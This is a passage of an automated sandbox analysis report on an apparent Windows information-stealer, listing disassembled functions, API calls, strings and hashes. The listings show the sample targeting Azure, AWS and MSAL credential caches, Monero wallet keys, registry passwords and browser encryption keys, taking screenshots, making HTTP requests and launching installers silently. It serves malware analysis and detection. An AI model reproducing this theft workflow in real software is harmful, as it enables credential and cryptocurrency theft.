                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 16cbe024e55e045bd090166d21bb8c1a87324f5f7655523334538067f642d74e
                          • Instruction ID: 5c2a964a784928bf69a0ec2db249d42008ddcb7276361c238c75c4f4e1f1964d
                          • Opcode Fuzzy Hash: 16cbe024e55e045bd090166d21bb8c1a87324f5f7655523334538067f642d74e
                          • Instruction Fuzzy Hash: 5041717A94020867CB64F770DC47FED773CAB65701F408894B689A60C1EFB457C98B92
                          Function 00179010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0017906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: a6bb298578f9a96dfcc684d776723dfeb12ea32199b2507adb55a5183c47bf71
                          • Instruction ID: 44109498f516a38f9208ca29464c1b127ed87e1953355a72d1a706ab62520227
                          • Opcode Fuzzy Hash: a6bb298578f9a96dfcc684d776723dfeb12ea32199b2507adb55a5183c47bf71
                          • Instruction Fuzzy Hash: A971CA76910608ABDB04EBE4DC89FEEB7BDAB49700F148508F516A7290DB35A905CB61
                          Function 00172E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001731C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0017335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001734EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 36330ecc7aba4355718f21c469ba21dd6de367f0bb4f2ffb16bb84175489f110
                          • Instruction ID: ab4c0bb6aeb3a451e9f454c7f78a8ede25ea4488de03f5d6c1c4004ba1fbe901
                          • Opcode Fuzzy Hash: 36330ecc7aba4355718f21c469ba21dd6de367f0bb4f2ffb16bb84175489f110
                          • Instruction Fuzzy Hash: 1B1214718501089ADB19FBA0DC92FEEB778AF64301F90C159F51A76191EF342B4ACF92
                          Function 001752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 00166280: InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                            • Part of subcall function 00166280: StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                            • Part of subcall function 00166280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                            • Part of subcall function 00166280: HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                            • Part of subcall function 00166280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                            • Part of subcall function 00166280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175318
                          • lstrlen.KERNEL32(00000000), ref: 0017532F
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00175364
                          • lstrlen.KERNEL32(00000000), ref: 00175383
                          • lstrlen.KERNEL32(00000000), ref: 001753AE
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 5e5402087a4c6e9365410456de86b08f36584c13ff0fee14590ef73951c5e7a0
                          • Instruction ID: 43872cc9634e8e82d2bf7bd41c3bc41bcb12ecca7234497fa2b30db2736a6c75
                          • Opcode Fuzzy Hash: 5e5402087a4c6e9365410456de86b08f36584c13ff0fee14590ef73951c5e7a0
                          • Instruction Fuzzy Hash: 6651F171910148ABCB18FF60CD96AEE7779AF60301F908018F41E9B591EF756B46CBA3
                          Function 001712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 0e388b9c5641f3088d9a6f8c629f0837ba5b4f607ec31e6f25004b33c2fd05db
                          • Instruction ID: 307e135877fe77890ebd7939f7e0b6501447e22e87f676eaadb6819aa17056a5
                          • Opcode Fuzzy Hash: 0e388b9c5641f3088d9a6f8c629f0837ba5b4f607ec31e6f25004b33c2fd05db
                          • Instruction Fuzzy Hash: 8CC154B6940119ABCB14EF60DC89FEE7778BFA4304F108598E50EA7141DB70AA85CF91
                          Function 00174280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 001742EC
                          • lstrcat.KERNEL32(?,00CCF2D8), ref: 0017430B
                          • lstrcat.KERNEL32(?,?), ref: 0017431F
                          • lstrcat.KERNEL32(?,00CCD7F0), ref: 00174333
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178D90: GetFileAttributesA.KERNEL32(00000000,?,00161B54,?,?,0018564C,?,?,00180E1F), ref: 00178D9F
                            • Part of subcall function 00169CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00169D39
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 001793C0: GlobalAlloc.KERNEL32(00000000,001743DD,001743DD), ref: 001793D3
                          • StrStrA.SHLWAPI(?,00CCF560), ref: 001743F3
                          • GlobalFree.KERNEL32(?), ref: 00174512
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                            • Part of subcall function 00169AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                            • Part of subcall function 00169AC0: LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 001744A3
                          • StrCmpCA.SHLWAPI(?,001808D1), ref: 001744C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001744D2
                          • lstrcat.KERNEL32(00000000,?), ref: 001744E5
                          • lstrcat.KERNEL32(00000000,00180FB8), ref: 001744F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: a99184f3737ddd7253fe8328c2d842355cbbbd5ab4f840538c9501fe99fa3fc6
                          • Instruction ID: f28cb05ba87508b155837ca6b1d6c653d91b7dc65db18f7de1fcf58568d9952a
                          • Opcode Fuzzy Hash: a99184f3737ddd7253fe8328c2d842355cbbbd5ab4f840538c9501fe99fa3fc6
                          • Instruction Fuzzy Hash: 5F7178B6900218ABCB15EBA0DC85FEE777DAF99300F008598F60997181EB35DB59CF91
                          Function 00161310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001612B4
                            • Part of subcall function 001612A0: RtlAllocateHeap.NTDLL(00000000), ref: 001612BB
                            • Part of subcall function 001612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001612D7
                            • Part of subcall function 001612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001612F5
                            • Part of subcall function 001612A0: RegCloseKey.ADVAPI32(?), ref: 001612FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0016134F
                          • lstrlen.KERNEL32(?), ref: 0016135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00161377
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00161465
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 001614EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: cf0fae3c501397a42055c0bebed9e616e3faa19e5668c6ab731b5d8119fb4e2d
                          • Instruction ID: e886235cc2f3e6adf73a35e569c79a70b748ed4515f8d020142a1a90ef9475e3
                          • Opcode Fuzzy Hash: cf0fae3c501397a42055c0bebed9e616e3faa19e5668c6ab731b5d8119fb4e2d
                          • Instruction Fuzzy Hash: 585113B195011957CB55FB60DD92FEE737CAF64301F8085A8B60EA2091EF305B89CFA6
                          Function 001675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0016733A
                            • Part of subcall function 001672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001673B1
                            • Part of subcall function 001672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0016740D
                            • Part of subcall function 001672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00167452
                            • Part of subcall function 001672D0: HeapFree.KERNEL32(00000000), ref: 00167459
                          • lstrcat.KERNEL32(00000000,001817FC), ref: 00167606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00167648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0016765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0016768F
                          • lstrcat.KERNEL32(00000000,00181804), ref: 001676A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001676D3
                          • lstrcat.KERNEL32(00000000,00181808), ref: 001676ED
                          • task.LIBCPMTD ref: 001676FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: d348c0bbf71292b84e38a873d4a575c95e0c630f175a1441746646e9cdb36dfa
                          • Instruction ID: 73163f911d253c5a4fbab1e2cae34ceb7f6f441faa412c79828502dfd1bd9dc1
                          • Opcode Fuzzy Hash: d348c0bbf71292b84e38a873d4a575c95e0c630f175a1441746646e9cdb36dfa
                          • Instruction Fuzzy Hash: 59316B72900509EFCB09EBA8DC95DFE777DAB56302F144118F102A72A0DB38A946CF52
                          Function 00178100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CCF158,00000000,?,00180E2C,00000000,?,00000000), ref: 00178130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00178158
                          • __aulldiv.LIBCMT ref: 00178172
                          • __aulldiv.LIBCMT ref: 00178180
                          • wsprintfA.USER32 ref: 001781AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 4f3bccd192d3006b25f865db2d9274b98a4d051e7ebeeb31f5111d3880098395
                          • Instruction ID: 592d36df82451bc678d8c42c15f474492aa752d4bd769e4b0ec9780bc2a8cecd
                          • Opcode Fuzzy Hash: 4f3bccd192d3006b25f865db2d9274b98a4d051e7ebeeb31f5111d3880098395
                          • Instruction Fuzzy Hash: B6211DB1E44618ABDB04DFD4DC49FAEBBBCFB44B10F108519F609BB280D77869018BA5
